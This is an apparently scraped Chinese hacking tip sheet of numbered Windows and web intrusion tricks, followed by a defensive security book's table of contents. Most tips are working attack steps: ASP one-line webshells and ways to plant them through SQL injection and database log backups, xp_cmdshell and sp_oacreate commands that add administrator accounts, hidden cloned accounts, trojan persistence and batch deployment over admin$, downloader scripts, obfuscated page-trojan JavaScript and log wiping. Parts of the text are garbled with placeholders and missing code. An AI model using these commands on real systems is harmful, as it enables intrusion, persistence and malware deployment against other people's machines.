1、Xp系统修改权限防止病毒或木马等破坏系统，cmd下，

　　cacls C:\windows\system32 /G hqw20:R

　　思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入

　　恢复 *** ：C:\>cacls C:\windows\system32 /G hqw20:F

　　2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。

　　3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。

　　4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号

　　5、利用INF文件来修改注册表

　　[Version]

　　Signature=”$CHICAGO$”

　　[Defaultinstall]

　　addREG=Ating

　　[Ating]

　　HKCU,”Software\Microsoft\Windows\CurrentVersion\Policies\system”,”disableregistrytools”,”0×00010001′,”1′

　　以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：

　　rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径

　　其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU

　　HKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU

　　HKEY_CURRENT_CONFIG 简写为 HKCC

　　0×00000000 代表的是 字符串值，0×00010001 代表的是 DWORD值

　　“1′这里代表是写入或删除注册表键值中的具体数据

　　6、关于 *** 穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,

　　多了一步就是在防火墙里添加个端口，然后导出其键值

　　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]

　　7、系统启动时Alerter服务启动前启动木马程序ating.exe,此 *** 很隐蔽

　　在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的 全路径。

　　8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。

　　9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,

　　可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。

　　10、用google帮我们找网站后台,搜索”filetype:asp site: inurl:login”

　　11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，

　　用法：xsniff –pass –hide –log pass.txt

　　12、google搜索的艺术

　　搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”

　　或“字符串的语法错误”可以找到很多sql注入漏洞。

　　13、还可以搜一些木马的关键字，比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。

　　14、cmd中输入 nc –vv –l –p 1987

　　做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃

　　15、 *** T++木马，先写个ating.hta文件,内容为

　　<script. language=”VBScript”>

　　set wshshell=createobject (“wscript.shell” )

　　a=wshshell.run(“你马的名称”,1)

　　window.close

　　</script>

　　再用mshta生成T++木马，命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。

　　16、搜索栏里输入

　　关键字%’and 1=1 and ‘%’=’

　　关键字%’and 1=2 and ‘%’=’

　　比较不同处 可以作为注入的特征字符

　　17、挂马代码

　　

　　

　　18、开启regedt32的SAM的管理员权限 检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键 值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这 *** 留住肉鸡, 这 *** 是简单克隆,

　　net localgroup administrators还是可以看出Guest是管理员来。

　　19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂 *** 等

　　用法: 安装： instsrv.exe 服务名称 路径

　　卸载： instsrv.exe 服务名称 REMOVE

　　[url=/soft/instsrv.rar]点击本站下载[/url]

　　21、SQL注入时工具—Internet选项—高级里找到显示友好的错误信息勾去掉

　　不能注入时要之一时间想到%5c暴库。

　　22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。由于还是ASP结尾，所以木马不会变~

　　23、缺少xp_cmdshell时

　　尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’

　　假如恢复不成功,可以尝试直接加用户(针对开3389的)

　　declare @o int

　　exec sp_oacreate ‘wscript.shell’,@o out

　　exec sp_oamethod @o,’run’,NULL,’cmd.exe /c net user ating ating /add’ 再提到管理员

　　24.批量种植木马.bat

　　for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中

　　for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间

　　扫描地址.txt里每个主机名一行 用\\开头

　　25、在程序上传shell过程中，程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request(“l”)%>,我们来把他的标签换一下： <script. language=VBScript. runat=server>execute request(“l”)</script> 保存为.asp,程序照样执行。

　　26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.

　　将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.

　　.cer 等后缀的文件夹下都可以运行任何后缀的asp木马

　　27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP

　　然后用#clear logg和#clear line vty *删除日志

　　28、电脑坏了省去重新安装系统的 ***

　　纯dos下执行，

　　xp:copy C:\WINDOWS\repair\*.* 到c:\windows\system32\config

　　2k: copy C:\winnt\repair\*.* 到c:\winnt\system32\config

　　29、解决TCP/IP筛选 在注册表里有三处，分别是：

　　HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip

　　HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

　　分别用

　　regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

　　regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

　　regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

　　命令来导出注册表项

　　然后把三个文件里的EnableSecurityFilters”=dword:00000001，

　　改成EnableSecurityFilters”=dword:00000000 再将以上三个文件分别用

　　regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。

　　30、使CHM木马无法在本地运行木马程序 将注册表”HKEY_CURRENT_U

　　SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0′下的1004项的值由原来十进制的0改为十六进制的3

　　31、全手工打造开3389工具

　　打开记事本，编辑内容如下：

　　echo [Components] > c:\sql

　　echo TSEnable=on >> c:\sql

　　sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

　　编辑好后存为BAT文件，上传至肉鸡，执行

　　32、挂马js代码document.write(‘’);保存到js页面里 可让所有页面挂马

　　33、让服务器重启

　　写个bat死循环:

　　@echo off

　　:loop1

　　cls

　　start cmd.exe

　　goto loop1

　　保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

　　34、如果你登录肉鸡的3389时发现有cmd一闪而过，那你可要小心了，管理员写了个bat在监视你，

　　@echo off

　　date /t >c:/3389.txt

　　time /t >>c:/3389.txt

　　attrib +s +h c:/3389.bat

　　attrib +s +h c:/3389.txt

　　netstat -an |find “ESTABLISHED” |find “:3389′ >>c:/3389.txt

　　并保存为3389.bat

　　打开注册表找到：Userinit这个键值 在末尾加入3389.bat所在的位置，比如我放到C盘，就写：,c:/3389.bat,注意一定要加个逗号

　　35、有时候提不了权限的话，试试这个命令，在命令行里输入：

　　start 然后点执行。（muma.htm是你上传好的漏洞网页）

　　输入：netstat -an | find “28876′ 看看是否成功绑定，如果有就telnet上去，就有了system权限，当然也可以nc连接，本地执行命令。

　　36、在cmd下用ftp上传马 *** ,我们可以用echo 写一个批处理文件

　　echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址

　　echo 你的FTP账号 >>c:\1.bat //输入账号

　　echo 你的FTP密码 >>c:\1.bat //输入密码

　　echo bin >>c:\1.bat //登入

　　echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么

　　echo bye >>c:\1.bat //退出

　　然后执行ftp -s:c:\1.bat即可

　　37、修改注册表开3389两法

　　（1）win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表

　　echo Windows Registry Editor Version 5.00 >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

　　etcache] >>3389.reg

　　echo “Enabled”=”0′ >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

　　NT\CurrentVersion\Winlogon] >>3389.reg

　　echo “ShutdownWithoutLogon”=”0′ >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]

　　>>3389.reg

　　echo “EnableAdminTSRemote”=dword:00000001 >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

　　>>3389.reg

　　echo “TSEnabled”=dword:00000001 >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg

　　echo “Start”=dword:00000002 >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

　　>>3389.reg

　　echo “Start”=dword:00000002 >>3389.reg

　　echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg

　　echo “Hotkey”=”1′ >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

　　Server\Wds\rdpwd\Tds cp] >>3389.reg

　　echo “PortNumber”=dword:00000D3D >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

　　Server\WinStations\RDP-Tcp] >>3389.reg

　　echo “PortNumber”=dword:00000D3D >>3389.reg

　　把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。

　　(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)

　　因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效

　　（2）winxp和win2003终端开启

　　用以下ECHO代码写一个REG文件：

　　echo Windows Registry Editor Version 5.00>>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

　　Server]>>3389.reg

　　echo “fDenyTSConnections”=dword:00000000>>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

　　Server\Wds\rdpwd\Tds cp]>>3389.reg

　　echo “PortNumber”=dword:00000d3d>>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

　　Server\WinStations\RDP-Tcp]>>3389.reg

　　echo “PortNumber”=dword:00000d3d>>3389.reg

　　然后regedit /s 3389.reg del 3389.reg

　　XP下不论开终端还是改终端端口都不需重启

　　38、找到SA密码为空的肉鸡一定要之一时间改SA密码，防止别人和我们抢肉吃

　　用查询分析器运行 EXEC sp_password NULL, ‘你要改的密码’, ‘sa’

　　39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的！

　　（1）数据库文件名应复杂并要有特殊字符

　　（2）不要把数据库名称写在conn.asp里，要用ODBC数据源

　　将conn.asp文档中的

　　DBPath=Server.MapPath(“数据库.mdb”)

　　conn.Open “driver={Microsoft Access Driver (*.mdb)};dbq=” ＆ DBPath

　　修改为：conn.open “ODBC数据源名称,” 然后指定数据库文件的位置

　　（3）不放在WEB目录里

　　40、登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉

　　可以写两个bat文件

　　@echo off

　　@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe

　　@del c:\winnt\system32\query.exe

　　@del %SYSTEMROOT%\system32\dllcache\query.exe

　　@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的

　　@echo off

　　@copy c:\winnt\system32 sadmin.exe c:\winnt\system32\com\1 sadmin.exe

　　@del c:\winnt\system32 sadmin.exe

　　@del %SYSTEMROOT%\system32\dllcache sadmin.ex

　　41、映射对方盘符

　　telnet到他的机器上，

　　net share 查看有没有默认共享 如果没有，那么就接着运行

　　net share c$=c:

　　net share现在有c$

　　在自己的机器上运行

　　net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘，盘符为K

　　42、一些很有用的老知识

　　type c:\boot.ini ( 查看系统版本 )

　　net start (查看已经启动的服务)

　　query user ( 查看当前终端连接 )

　　net user ( 查看当前用户 )

　　net user 用户 密码/add ( 建立账号 )

　　net localgroup administrators 用户 /add (提升某用户为管理员)

　　ipconfig -all ( 查看IP什么的 )

　　netstat -an ( 查看当前 *** 状态 )

　　findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)

　　克隆时Administrator对应1F4

　　guest对应1F5

　　tsinternetuser对应3E8

　　43、如果对方没开3389，但是装了Remote Administrator Service

　　用这个命令F:\ftp.exe “regedit -s F:\longyi.biz\RAdmin.reg” 连接

　　解释：用serv-u漏洞导入自己配制好的radmin的注册表信息

　　先备份对方的F:\ftp.exe “regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin”

　　44、用lcx做内网端口映射，先在肉鸡上监听 lcx -listen 52 8089 (端口自定）

　　本地上运行映射，lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口）

　　45、在服务器写入vbs脚本下载指定文件（比如用nbsi利用注入漏洞写入）

　　echo Set x=CreateObject(^”Microsoft.XMLHTTP^”):x.Open

　　^”GET^”,LCase(WScript.Arguments(0)),0:x.Send():Set s=

　　CreateObject(^”ADODB.Stream^”):s.Mode=3:s.Type=

　　1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs

　　（这是完整的一句话，其中没有换行符）

　　然后下载:

　　cscript. down.vbs hack.exe

　　46、一句话木马成功依赖于两个条件：

　　１、服务端没有禁止adodb.Stream或FSO组件

　　２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。

　　47、利用DB_OWNER权限进行手工备份一句话木马的代码：

　　;alter database utsz set RECOVERY FULL–

　　;create table cmd (a image)–

　　;backup log utsz to disk=‘D:\cmd’ with init–

　　;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)–

　　;backup log utsz to disk=‘D:webhacker.asp’–

　　注：0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。

　　48、tlntadmn是telnet服务的设置命令，可以对telnet服务的端口、认证方式等进行设置：

　　用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options

　　所有会话用 ‘all’。

　　-s sessionid列出会话的信息。

　　-k sessionid终止会话。

　　-m sessionid发送消息到会话。

　　config配置 telnet 服务器参数。

　　common_options 为:

　　-u user 指定要使用其凭据的用户

　　-p password 用户密码

　　config_options 为:

　　 dom=domain 设定用户的默认域

　　 ctrlakeymap=yes|no 设定 ALT 键的映射

　　 timeout=hh:mm:ss 设定空闲会话超时值

　　 timeoutactive=yes|no 启用空闲会话。

　　 maxfail=attempts 设定断开前失败的登录企图数。

　　 maxconn=connections设定更大连接数。

　　 port=number设定 telnet 端口。

　　 sec=[+/-]NTLM [+/-]passwd

　　设定身份验证机构

　　 fname=file 指定审计文件名。

　　 fsize=size 指定审计文件的更大尺寸(MB)。

　　 mode=console|stream指定操作模式。

　　 auditlocation=eventlog|file|both

　　指定记录地点

　　 audit=[+/-]user [+/-]fail [+/-]admin

　　49、例如:在IE *** 问:

　　就会跳转到

　　hack.txt里面的代码是：

　　

　　把这个hack.txt发到你空间就可以了！

　　这个可以利用来做网马哦！

　　50、autorun的病毒可以通过手动限制！

　　1，养成好习惯，插入U盘或移动硬盘，都要按住shift让其禁止自动运行！

　　2，打开盘符用右键打开！切忌双击盘符～

　　3，可以利用rar软件查看根目录下autorun病毒并删除之！他可以处理一些连右键都无法打开的分区！

　　51、log备份时的一句话木马：

　　a).<%%25Execute(request(“go”))%%25>

　　b).<%Execute(request(“go”))%>

　　c).%><%execute request(“go”)%><%

　　d).<script. language=VBScript. runat=server>execute request(“ *** ”)</script>

　　e).<%25Execute(request(“l”))%25>

　　f).<%if request(“cmd”)”" then execute request(“pass”)%>

　　52、at “12:17′ /interactive cmd

　　执行后可以用AT命令查看新加的任务

　　用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。

　　53、隐藏ASP后门的两种 ***

　　1、建立非标准目录：mkdir images..\

　　拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..

　　ews.asp

　　通过web访问ASP木马：

　　如何删除非标准目录：rmdir images..\ /s

　　2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:

　　mkdir programme.asp

　　新建1.txt文件内容：

　　新建12.jpg文件内容：<%execute(request(“l”))%> 或使用GIF与ASP合并后的文件

　　attrib +H +S programme.asp

　　通过web访问ASP一句话木马：

　　54、attrib /d /s c:\windows +h +s，后windows目录变为隐藏＋系统，隐藏属性为灰不可更改，windows目录下面的文件和目录并没有继承属性，原来是什么样还是什么样。

　　然后在利用attrib /d /s c:\windows -h -s，windows目录可以显示，隐藏属性可以再次选中。

　　55、 *** 隐蔽挂马

　　1.

　　var tr4c3=”’”;

　　document.write(tr4c3);

　　避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些，混淆度增加。

　　2.

　　转换进制，然后用EVAL执行。如

　　eval(“\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73′);

　　不过这个有点显眼。

　　3.

　　document.write (‘’);

　　最后一点，别忘了把文件的时间也修改下。

　　56.3389终端入侵常用DOS命令

　　taskkill taskkill /PID 1248 /t

　　tasklist 查进程

　　cacls “C:\Program Files\ewido anti-spyware 4.0\guard.exe” /d:everyone 改、降低某文件权限

　　iisreset /reboot

　　tsshutdn /reboot /delay:1 重起服务器

　　logoff 12 要使用会话 ID（例如，会话 12）从会话中注销用户，

　　query user 查看当前终端用户在线情况

　　要显示有关所有会话使用的进程的信息，请键入：query process *

　　要显示有关会话 ID 2 使用的进程的信息，请键入：query process /ID:2

　　要显示有关服务器 SERVER2 上所有活动会话的信息，请键入：query session /server:SERVER2

　　要显示有关当前会话 MODEM02 的信息，请键入：query session MODEM02

　　命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启

　　命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统

　　命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。

　　命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机

　　56、在地址栏或按Ctrl+O，输入：

　　javascript.:s=document.documentElement.outerHTML;document.write(‘’);document.body.innerText=s;

　　源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。

　　57、net user的时候，是不能显示加$的用户，但是如果不处理的话，

　　用net localgroup administrators是可以看到管理组下，加了$的用户的。

　　58、 sa弱口令相关命令

　　一.更改sa口令 *** ：

　　用sql综合利用工具连接后，执行命令：

　　exec sp_password NULL,’20001001′,’sa’

　　(提示：慎用!)

　　二.简单修补sa弱口令.

　　 *** 1:查询分离器连接后执行：

　　if exists (select * from

　　dbo.sysobjects where id=object_id(N’[dbo].[xp_cmdshell]‘) and

　　OBJECTPROPERTY(id, N’IsExtendedProc’)=1)

　　exec sp_dropextendedproc N’[dbo].[xp_cmdshell]‘

　　GO

　　然后按F5键命令执行完毕

　　 *** 2:查询分离器连接后

　　之一步执行：use master

　　第二步执行：sp_dropextendedproc ‘xp_cmdshell’

　　然后按F5键命令执行完毕

　　三.常见情况恢复执行xp_cmdshell.

　　1 未能找到存储过程’master..xpcmdshell’.

　　恢复 *** ：查询分离器连接后,

　　之一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’declare @o int

　　第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’

　　然后按F5键命令执行完毕

　　2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）

　　恢复 *** ：查询分离器连接后,

　　之一步执行：sp_dropextendedproc “xp_cmdshell”

　　第二步执行：sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’

　　然后按F5键命令执行完毕

　　3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)

　　恢复 *** ：查询分离器连接后,

　　之一步执行:exec sp_dropextendedproc ‘xp_cmdshell’

　　第二步执行:exec sp_addextendedproc ‘xp_cmdshell’,'xpweb70.dll’

　　然后按F5键命令执行完毕

　　四.终极 *** .

　　如果以上 *** 均不可恢复,请尝试用下面的办法直接添加帐户:

　　查询分离器连接后,

　　2000servser系统:

　　declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add’

　　declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add’

　　xp或2003server系统:

　　declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 用户名 密码 /add’

　　declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add’

　　59、开23端口telnet的话，太危险了。

　　大家都可以扫描到。就不是个人的后门了。

　　这里很简单只需要一句命令：

　　tlntadmn config port=1001

　　这句命令的意思是把telnet23端口改为1001

　　大家可以自己更改在1025以内的端口。可以欺骗性的改25。呵呵

　　1.1 认识黑客

　　1.1.1 黑客的过去、现在与未来

　　1.1.2 黑客基础术语

　　1.1.3 常见的黑客攻击目标

　　1.2 IP地址

　　1.2.1 IP地址概述

　　1.2.2 IP地址分类

　　1.2.3 设置本机IP地址

　　1.3 进程与端口基础

　　1.3.1 认识进程

　　1.3.2 进程基础操作

　　1.3.3 端口概述

　　1.3.4 查看端口

　　2.1 Windows命令行常用操作

　　2.1.1 启动Windows系统命令

　　2.1.2 复制与粘贴命令行

　　2.1.3 窗口基础设置

　　2.2 常用 *** 命令

　　2.2.1 ping命令

　　2.2.2 netstat命令

　　2.2.3 net命令

　　2.2.4 telnet命令

　　2.2.5 ftp命令

　　2.3 其他命令

　　2.3.1 arp命令

　　2.3.2 traceroute命令

　　2.3.3 route命令

　　3.1 黑客“踩点”

　　3.1.1 黑客“踩点”概述

　　3.1.2 黑客“踩点”的方式

　　3.1.3 whois域名查询

　　3.1.4 DNS查询

　　3.2 常见的扫描工具

　　3.2.1 扫描概述

　　3.2.2 nmap扫描器

　　3.2.3 N-Stalker扫描工具

　　3.3 常见的嗅探工具

　　3.3.1 嗅探概述

　　3.3.2 SRSniffer嗅探工具

　　3.3.3 影音嗅探器

　　3.3.4 嗅探防范

　　4.1 认识远程控制技术

　　4.1.1 何为远程控制技术

　　4.1.2 远程控制的技术原理

　　4.1.3 远程控制与远程协助的区别

　　4.1.4 远程控制技术应用领域

　　4.2 Windows系统的远程桌面连接

　　4.2.1 远程桌面前的准备

　　4.2.2 远程桌面系统的启动及配置

　　4.2.3 Windows远程桌面连接的优缺点

　　4.3 TeamViewer的配置与使用

　　4.3.1 了解TeamViewer

　　4.3.2 TeamViewer的配置

　　4.3.3 TeamViewer的使用

　　4.3.4 多模式远程使用

　　4.3.5 TeamViewer的“利器”──视频会议

　　5.1 信息的加密与解密

　　5.1.1 认识加密与解密

　　5.1.2 破解密码的常见 ***

　　5.1.3 设置高安全系数的密码

　　5.2 系统密码攻防

　　5.2.1 设置Windows账户密码

　　5.2.2 设置屏幕保护密码

　　5.2.3 设置BIOS密码

　　5.2.4 设定Windows密码重置盘

　　5.3 文档、文件的加密

　　5.3.1 Word文档加密

　　5.3.2 Excel文档加密

　　5.3.3 WinRAR加密文件

　　5.4 常用的加密、解密工具

　　5.4.1 BitLocker加密磁盘

　　5.4.2 “加密精灵”工具

　　5.4.3 AORP文档破解工具

　　5.4.4 ARCHPR RAR破解工具

　　6.1 认识系统漏洞

　　6.1.1 系统漏洞的概念

　　6.1.2 系统漏洞的类型

　　6.2 系统漏洞防范策略

　　6.2.1 Windows Update更新系统

　　6.2.2 启用Windows防火墙

　　6.2.3 EFS加密文件系统

　　6.2.4 软件更新漏洞

　　6.3 注册表防范策略

　　6.3.1 注册表的作用

　　6.3.2 禁止使用注册表编辑器

　　6.3.3 使用计算机安全软件禁止修改注册表

　　6.3.4 关闭Windows远程注册表服务

　　6.3.5 清理注册表垃圾

　　7.1 走近木马

　　7.1.1 木马概述

　　7.1.2 木马的特性

　　7.1.3 木马分类

　　7.1.4 木马的伪装手段

　　7.2 木马相关技术

　　7.2.1 木马捆绑技术

　　7.2.2 自解压捆绑木马

　　7.2.3 木马加壳

　　7.3 木马的清理与防御

　　7.3.1 利用沙盘运行程序

　　7.3.2 PEiD木马查壳

　　7.3.3 运用木马清除大师查杀木马

　　7.3.4 运用360查杀木马

　　7.3.5 手动清除木马

　　8.1 走近计算机病毒

　　8.1.1 计算机病毒概述

　　8.1.2 计算机病毒的特点

　　8.1.3 计算机病毒的分类

　　8.1.4 计算机病毒的危害

　　8.1.5 *** 类计算机病毒

　　8.2 清理与防御计算机病毒

　　8.2.1 个人防范计算机病毒的措施

　　8.2.2 运用杀毒软件查杀病毒

　　8.2.3 开启病毒防火墙

　　8.3 防御新型攻击──勒索病毒

　　8.3.1 走近勒索病毒

　　8.3.2 破解勒索文件

　　8.3.3 申请反勒索服务

　　9.1 防范网页恶意代码

　　9.1.1 认识网页恶意代码

　　9.1.2 修改被篡改内容

　　9.1.3 检测网页恶意代码

　　9.2 清理页面广告

　　9.2.1 设置弹出窗口阻止程序

　　9.2.2 删除网页广告

　　9.2.3 运用软件屏蔽广告

　　9.3 浏览器安全设置

　　9.3.1 设置Internet安全级别

　　9.3.2 屏蔽 *** 自动完成功能

　　9.3.3 添加受限站点

　　9.3.4 清除上网痕迹

　　10.1 局域网安全基础

　　10.1.1 局域网简介

　　10.1.2 局域网原理

　　10.1.3 局域网的安全隐患

　　10.2 局域网安全共享

　　10.2.1 设置共享文件夹账户与密码

　　10.2.2 隐藏共享文件夹

　　10.2.3 设置虚假描述IP

　　10.3 局域网的防护与监控

　　10.3.1 LanSee工具

　　10.3.2 *** 特工

　　10.3.3 局域网防护

　　11.1 系统日志

　　11.1.1 系统日志概述

　　11.1.2 事件查看器查看日志

　　11.1.3 注册表查看日志

　　11.2 WebTrends日志分析

　　11.2.1 创建日志站点

　　11.2.2 生成日志报表

　　11.3 清除服务器日志

　　11.3.1 手动删除日志

　　11.3.2 批处理清除日志

　　12.1 走进 *** ***

　　12.1.1 *** *** 概述

　　12.1.2 *** 服务器的主要功能

　　12.1.3 *** 分类

　　12.2 *** 操作

　　12.2.1 HTTP *** 浏览器

　　12.2.2 SocksCap64 *** 工具

　　12.2.3 VPN ***

　　12.3 *** 追踪

　　12.3.1 *** 路由追踪器

　　12.3.2 其他常用追踪

　　13.1 影子系统的使用

　　13.1.1 影子系统概述

　　13.1.2 影子系统安装

　　13.1.3 影子系统模式设置

　　13.1.4 目录迁移

　　13.2 系统重装

　　13.2.1 OneKey Ghost重装系统

　　13.2.2 *** U盘启动盘

　　13.2.3 一键重装系统

　　14.1 常见的数据备份 ***

　　14.1.1 数据备份概述

　　14.1.2 Windows系统盘备份

　　14.1.3 云盘备份

　　14.1.4 备份浏览器收藏夹

　　14.2 还原与备份操作系统

　　14.2.1 使用还原点备份与还原系统

　　14.2.2 使用GHOST备份与还原系统

　　14.3 常用的数据恢复工具

　　14.3.1 利用“Recuva”恢复数据

　　14.3.2 运用360安全卫士恢复文件

　　15.1 间谍软件的防护与清理

　　15.1.1 间谍软件概述

　　15.1.2 Windows Defender检测与清除间谍软件

　　15.1.3 Spy Emergency清除间谍软件

　　15.2 流氓软件的防护与清理

　　15.2.1 流氓软件概述

　　15.2.2 设置禁止自动安装

　　15.2.3 Combofix清除流氓软件

　　15.2.4 其他应对流氓软件的措施

　　15.3 清理系统垃圾

　　15.3.1 磁盘清理

　　15.3.2 批处理脚本清理垃圾

　　15.3.3 手动删除

　　15.3.4 专用软件清除垃圾

　　16.1 走近WiFi

　　16.1.1 WiFi的工作原理

　　16.1.2 WiFi的应用领域

　　16.1.3 WiFi安全问题

　　16.1.4 查询WiFi信息

　　16.2 无线路由器安全设置

　　16.2.1 无线路由器的基本设置

